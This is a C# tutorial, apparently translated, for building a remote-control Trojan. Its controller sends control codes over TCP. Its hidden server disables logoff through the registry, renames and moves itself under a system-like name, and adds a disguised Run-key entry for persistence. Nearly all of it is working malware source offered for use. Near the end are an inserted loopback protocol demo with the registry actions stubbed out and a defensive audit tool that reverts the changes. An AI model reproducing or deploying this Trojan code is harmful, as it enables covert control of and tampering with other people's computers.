Trojan introduction
Because this article explores Trojans, some background on how a Trojan is composed is needed before the introduction. A complete Trojan system consists of a hardware part, a software part, and a specific connection part. Here we introduce mainly the software part, which consists of a controller program, the Trojan itself (a background service), and the Trojan configuration. The controller is the program used to remotely control the server; the Trojan is the program planted on the server; the configuration is the port number, trigger condition, Trojan name and so on, the settings that make the Trojan harder to notice.
Technology used:
The controller sends a control code to the server; the server runs in the background and, on receiving the code, modifies the registry. The technology is not difficult: it mainly comes down to C# network programming and registry modification.
Controller development:
The controller sends a control code to the server. After the server receives the control code it carries out the requested action, and if it completes the job it returns a success message.
The control codes themselves are up to you to define and need no explanation; the points below are the ones that take some care.
1. Connection request
Use the System.Net.Sockets.TcpClient class from the .NET class library:
    TcpClient(string hostname, int port)
hostname is the host to be controlled (an IP address also works); port is the port number.
    // System.EventArgs is the base class for event data classes
    private void button7_Click(object sender, System.EventArgs e)
    {
        // Log the operation: append it to the RichTextBox control
        richTextBox1.AppendText("Request connection " + textBox1.Text + "\n");
        int port = 6678;
        try
        {
            // Initialize a new TcpClient instance and connect to the given port on the given host
            client = new TcpClient(textBox1.Text, port);
        }
        catch
        {
            MessageBox.Show("Server is not online! Check the host name you entered.");
            richTextBox1.AppendText("Server is not online! Check the host name you entered.\n");
        }
    } // private void button7_Click
2. Testing whether the controlled machine is connected. The program sends a test control code and watches whether the controlled end reacts; if a reply comes back, the connection is good. The handlers below use these form fields:
    private TcpClient client;
    // NetworkStream provides the data stream for network access
    private NetworkStream stream;
    private Thread threadReceive;
    // the control code to send; "000000" means nothing has been selected yet
    private string control = "000000";
The code is as follows:
    private void button8_Click(object sender, System.EventArgs e)
    {
        // Log the operation
        richTextBox1.AppendText("Test\n");
        try
        {
            stream = client.GetStream();
            if (stream.CanWrite)
            {
                // Send the test control code
                string test = "jiance";
                byte[] by = System.Text.Encoding.ASCII.GetBytes(test.ToCharArray());
                stream.Write(by, 0, by.Length);
                // Push the data out
                stream.Flush();
                // Start the thread that receives the reply
                // Receive is the function the thread runs; see the analysis later
                threadReceive = new Thread(new ThreadStart(Receive));
                threadReceive.Start();
            }
        }
        catch (Exception ee)
        {
            richTextBox1.AppendText(ee.Message + "\n");
            MessageBox.Show(ee.Message);
        }
    }
3. Sending the control code that performs an action
    private void button9_Click(object sender, System.EventArgs e)
    {
        // Choose the control code to send; the RadioButtons are form controls
        if (radioButton1.Checked) { control = form2.zhucex; }
        else if (radioButton2.Checked) { control = form3.zhuces; }
        else if (radioButton3.Checked) { control = Warring; }
        else if (radioButton4.Checked) { control = suggest; }
        else if (radioButton5.Checked) { control = form4.mumawe; }
        else if (radioButton6.Checked) { control = Drop; }
        if (control == "000000")
        {
            MessageBox.Show("You did not choose a control target! No control signal sent.");
            richTextBox1.AppendText("You did not choose a control target! No control signal sent.\n");
        }
        else
        {
            try
            {
                // Log the operation
                richTextBox1.AppendText(control + " is being sent, waiting for response...\n");
                stream = client.GetStream();
                if (stream.CanWrite)
                {
                    byte[] by = System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());
                    stream.Write(by, 0, by.Length);
                    stream.Flush();
                    threadReceive = new Thread(new ThreadStart(Receive));
                    threadReceive.Start();
                } // end if
            } // try
            catch
            {
                richTextBox1.AppendText("Server not connected; control is invalid!\n");
                MessageBox.Show("Server not connected; control is invalid!");
            }
        } // else
    }
4. The thread function that receives the reply
    private void Receive()
    {
        // Buffer for the reply
        byte[] bb = new byte[3];
        // Read up to 3 bytes; i is the number of bytes actually read (a single Read
        // on a TCP stream may return fewer bytes than requested)
        int i = stream.Read(bb, 0, 3);
        // Convert to a string; for a Chinese reply code use
        // string ss = System.Text.Encoding.Unicode.GetString(bb, 0, i); instead
        string ss = System.Text.Encoding.ASCII.GetString(bb, 0, i);
        // Reply codes defined on the server side: "hjc" means the connection test
        // succeeded, "hkz" means the control action succeeded.
        // (Touching form controls from a worker thread like this is only tolerated by
        // early .NET versions; later versions require Control.Invoke.)
        if (ss == "hjc")
        {
            MessageBox.Show("Connection success");
            richTextBox1.AppendText("Connection success\n");
        }
        if (ss == "hkz")
        {
            richTextBox1.AppendText(control + " control success\n");
            MessageBox.Show(control + " control success");
        }
    }
Service development:
To implement the Trojan service program, three things are needed: background operation (hiding), receiving the control code, and modifying the registry. These three aspects are introduced below.
1. In Visual C#, creating a background program is easy. First create a new C# Windows application; the project name is up to you (but pick a name that blends in with system program names). Set the form's ShowInTaskbar property to false so that it does not appear in the taskbar, and set the WindowState property to Minimized so that the form stays hidden. Note that this only hides the window; the process is still visible in Task Manager. You can also set these properties in InitializeComponent(), which initializes the form and runs before it is displayed. The code is as follows:
    private void InitializeComponent()
    {
        //
        // Form1
        //
        // Form scaling base and client size
        this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
        this.ClientSize = new System.Drawing.Size(368, 357);
        // Form name
        this.Name = "Form1";
        // Properties that make it run in the background
        this.ShowInTaskbar = false;
        this.Text = "Form1";
        this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
    }
2. Listening for the controller. The listener is started in the form constructor. The service uses these fields:
    private TcpListener listener;
    private Socket socket;
    // accumulated warning text returned to the controller by RetMessage()
    private string myStr = "";

    public Form1() // form constructor
    {
        //
        // Windows Form Designer support
        //
        InitializeComponent();
        //
        // TODO: add any constructor code after the InitializeComponent call
        // Add your listening code here
        // The port can be chosen freely; a fixed port is used here
        int port = 6678;
        // System.Net.Sockets.TcpListener listens for TCP clients on the network
        listener = new TcpListener(IPAddress.Any, port);
        // Start listening
        listener.Start();
        // Add the thread that receives the control code. To stop the thread, use Thread.Abort()
        // ReControlCode is the function the thread runs; it selects the matching registry
        // modification function according to the control code received
        Thread thread = new Thread(new ThreadStart(ReControlCode));
        thread.Start();
    }
The ReControlCode function is as follows (see the full code for the rest):
    private void ReControlCode()
    {
        // Set up the receiving socket; listener.AcceptSocket() returns the accepted client connection
        socket = listener.AcceptSocket();
        // As long as the connection is up
        while (socket.Connected)
        {
            // Receive the control code (6 bytes)
            byte[] by = new byte[6];
            int i = socket.Receive(by, by.Length, SocketFlags.None);
            // Receive returns 0 once the controller has closed the connection
            if (i == 0) break;
            string ss = System.Text.Encoding.ASCII.GetString(by, 0, i);
            // Perform different functions according to the control code,
            // i.e. pick the registry modification that matches the code
            switch (ss)
            {
                case "jiance": // connection test: return the test reply
                    string str = "hjc";
                    byte[] bytee = System.Text.Encoding.ASCII.GetBytes(str);
                    socket.Send(bytee, 0, bytee.Length, SocketFlags.None);
                    break;
                case "ZX1000":
                    // registry modification function, user-defined; see the analysis below
                    Unlogoff();
                    // return the control result message
                    RetMessage();
                    break;
                case "ZX0100":
                    // registry modification function
                    Unclose();
                    // return the control result message
                    RetMessage();
                    break;
                // the remaining cases follow the same pattern and are omitted
                default:
                    break;
            } // switch
        } // while
    } // private void ReControlCode
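The controller/server exchange described in the controller section (steps 2 to 4) and in ReControlCode above, run over loopback in one process as an added example; this is not code from the original article. The control codes "jiance", "ZX1000" and "ZX0100" and the replies "hjc" and "hkz" are the article's; the port 6678 on 127.0.0.1, the "err" reply for unknown codes, the ReadExactly helper and the stubbed action handlers are assumptions of this example. It also shows the check the original code skips: a fixed-length message has to be read in a loop, because a single Read on a TCP stream may return fewer bytes than requested.

```csharp
// Added example (not from the original article): the controller/server exchange
// over loopback. Assumed: port 6678 on 127.0.0.1, the "err" reply, ReadExactly,
// and the stubbed action handlers (no registry is touched here).
using System;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;

static class TrojanProtocolDemo
{
    const int CodeLen = 6;   // every control code is exactly 6 ASCII bytes
    const int ReplyLen = 3;  // every reply is exactly 3 ASCII bytes

    // TCP is a byte stream: one Read() may return fewer bytes than asked for,
    // so loop until the fixed-size message is complete.
    static byte[] ReadExactly(NetworkStream s, int count)
    {
        var buf = new byte[count];
        int got = 0;
        while (got < count)
        {
            int n = s.Read(buf, got, count - got);
            if (n == 0) throw new EndOfStreamException("peer closed the connection");
            got += n;
        }
        return buf;
    }

    // Server side: what the article's ReControlCode() does, minus the registry writes.
    static void ServeOne(TcpListener listener)
    {
        using (TcpClient conn = listener.AcceptTcpClient())
        using (NetworkStream s = conn.GetStream())
        {
            while (true)
            {
                string code;
                try { code = Encoding.ASCII.GetString(ReadExactly(s, CodeLen)); }
                catch (EndOfStreamException) { return; }   // controller went away: stop cleanly

                string reply;
                switch (code)
                {
                    case "jiance": reply = "hjc"; break;   // connectivity test
                    case "ZX1000":
                    case "ZX0100": reply = "hkz"; break;   // action handlers stubbed out here
                    default:       reply = "err"; break;   // assumed reply for unknown codes
                }
                byte[] r = Encoding.ASCII.GetBytes(reply);
                s.Write(r, 0, r.Length);
            }
        }
    }

    // Controller side: send one 6-byte code, wait for the 3-byte reply.
    static string SendCode(NetworkStream s, string code)
    {
        if (code.Length != CodeLen) throw new ArgumentException("control codes are 6 bytes");
        byte[] b = Encoding.ASCII.GetBytes(code);
        s.Write(b, 0, b.Length);
        return Encoding.ASCII.GetString(ReadExactly(s, ReplyLen));
    }

    static void Main()
    {
        var listener = new TcpListener(IPAddress.Loopback, 6678);
        listener.Start();
        var server = new Thread(() => ServeOne(listener));
        server.Start();

        using (var client = new TcpClient("127.0.0.1", 6678))
        using (NetworkStream s = client.GetStream())
        {
            foreach (string code in new[] { "jiance", "ZX1000", "abcdef" })
                Console.WriteLine("{0} -> {1}", code, SendCode(s, code));
        }
        server.Join();
        listener.Stop();
    }
}
```

Disposing the client closes the connection, which makes the server's ReadExactly see a zero-byte read and return; the article's while (socket.Connected) loop has no such exit, since Socket.Connected is not updated when the peer disconnects.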
3. To work with the registry in C#, use the Microsoft.Win32 namespace in the .NET class library, which provides two kinds of classes: those that handle events raised by the operating system, and those that manipulate the system registry (Registry and RegistryKey). Its use is shown below. Here I have written a subroutine that modifies the registry so that the computer cannot log off. Some background first: under the subkey Software\Microsoft\Windows\CurrentVersion\Policies\Explorer of HKEY_LOCAL_MACHINE, setting the value NoLogOff to 1 removes the ability to log off. Registry paths use backslashes as separators; with forward slashes OpenSubKey simply returns null. The following function implements the modification in C#:
    private void Unlogoff()
    {
        // Get the root node of the local machine's registry
        Microsoft.Win32.RegistryKey rlocal = Registry.LocalMachine;
        // A variable for the registry subkey; OpenSubKey returns null if the key does not exist
        RegistryKey key1 = null;
        try
        {
            // RegistryKey.OpenSubKey(string name, bool writable) retrieves the given subkey;
            // name is the key path, writable = true allows modification (the default, false, is read-only)
            key1 = rlocal.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", true);
            // Set the value name and data under the subkey (an int is stored as REG_DWORD)
            key1.SetValue("NoLogOff", 1);
            // Close the opened subkey
            key1.Close();
            // Build the warning string
            myStr = myStr + @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer value NoLogOff has been modified! Please set it back to 0!";
        }
        catch { }
        // If the subkey did not exist, create it
        if (key1 == null)
        {
            try
            {
                // RegistryKey.CreateSubKey(string subkey) creates the wanted subkey (or opens it if present)
                RegistryKey key2 = rlocal.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer");
                key2.SetValue("NoLogOff", 1);
                key2.Close();
                myStr = myStr + @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer value NoLogOff has been modified! Please set it back to 0!";
            }
            catch { }
        }
    }
4. Another important function of a Trojan is self-replication and relocation. The Trojan must automatically hide itself in the SYSTEM or SYSTEM32 directory to avoid discovery. The relocation code is analysed below; what it does is move the Trojan from C:\WINNT\system\msdoss.exe to D:\WINNT\system32\ExPleror.exe, changing its name on the way. It uses the .NET namespace System.IO, which provides synchronous and asynchronous reading and writing of streams and files; here we use the System.IO.File class. Note that if the file being moved is the Trojan's own running executable, a move to another volume fails on Windows, and the empty catch below silently swallows that failure.
    private void Movec1()
    {
        try
        {
            // File.Move(string sourceFileName, string destFileName) moves a file;
            // sourceFileName is the file to move, destFileName is its new path and name
            File.Move(@"C:\WINNT\system\msdoss.exe", @"D:\WINNT\system32\ExPleror.exe");
        }
        catch { }
        // Make the relocated Trojan start automatically; the analysis is the same as above
        RegistryKey rlocal = Registry.LocalMachine;
        RegistryKey key1 = null;
        try
        {
            key1 = rlocal.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
            key1.SetValue("MicrosoftT", @"D:\WINNT\system32\ExPleror.exe");
            key1.Close();
        }
        catch { }
        if (key1 == null)
        {
            try
            {
                RegistryKey key2 = rlocal.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run");
                key2.SetValue("MicrosoftT", @"D:\WINNT\system32\ExPleror.exe");
                key2.Close();
            }
            catch { }
        }
    } // Movec1()
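A defender-side check for the two registry changes made in Unlogoff() and Movec1() above, as an added example that is not part of the original article: it reports whether the NoLogOff policy is set, lists the HKLM Run entries, and can revert both. The key paths and the value names NoLogOff and MicrosoftT are taken from the article; treating MicrosoftT as the entry to remove and the --fix switch are assumptions of this example. Writing under HKEY_LOCAL_MACHINE requires administrator rights.

```csharp
// Added example (not from the original article): audit and revert the registry
// changes described above. Assumed: the --fix switch and that "MicrosoftT" is the
// Run entry to remove. Run elevated to modify HKLM.
using System;
using Microsoft.Win32;

static class TrojanRegistryAudit
{
    const string PolicyKey = @"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer";
    const string RunKey    = @"Software\Microsoft\Windows\CurrentVersion\Run";

    // True if NoLogOff is a non-zero DWORD, i.e. the effect of the article's Unlogoff().
    static bool NoLogOffIsSet()
    {
        using (RegistryKey k = Registry.LocalMachine.OpenSubKey(PolicyKey, writable: false))
        {
            if (k == null) return false;      // OpenSubKey returns null when the key is absent
            object v = k.GetValue("NoLogOff");
            return v is int && (int)v != 0;
        }
    }

    // Lists every HKLM Run entry so the operator can spot the one the Trojan added.
    static void DumpRunEntries()
    {
        using (RegistryKey k = Registry.LocalMachine.OpenSubKey(RunKey, writable: false))
        {
            if (k == null) { Console.WriteLine("(no HKLM Run key)"); return; }
            foreach (string name in k.GetValueNames())
                Console.WriteLine("Run\\{0} = {1}", name, k.GetValue(name));
        }
    }

    // Revert: delete the value rather than writing 0, so the key returns to its default state.
    static void RestoreLogOff()
    {
        using (RegistryKey k = Registry.LocalMachine.OpenSubKey(PolicyKey, writable: true))
        {
            if (k != null) k.DeleteValue("NoLogOff", throwOnMissingValue: false);
        }
    }

    static void RemoveRunEntry(string valueName)
    {
        using (RegistryKey k = Registry.LocalMachine.OpenSubKey(RunKey, writable: true))
        {
            if (k != null) k.DeleteValue(valueName, throwOnMissingValue: false);
        }
    }

    static void Main(string[] args)
    {
        Console.WriteLine("NoLogOff policy set: {0}", NoLogOffIsSet());
        DumpRunEntries();
        if (args.Length > 0 && args[0] == "--fix")
        {
            RestoreLogOff();
            RemoveRunEntry("MicrosoftT");   // the value name used in the article's Movec1()
            Console.WriteLine("reverted");
        }
    }
}
```

On 64-bit Windows a 32-bit build of this program is redirected to the WOW6432Node view of HKLM\Software; to inspect the native view open the hive with RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64) instead of Registry.LocalMachine. Removing the Run entry does not delete the relocated executable itself; that still has to be found and removed on disk.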
With this, a simple C# Trojan is complete.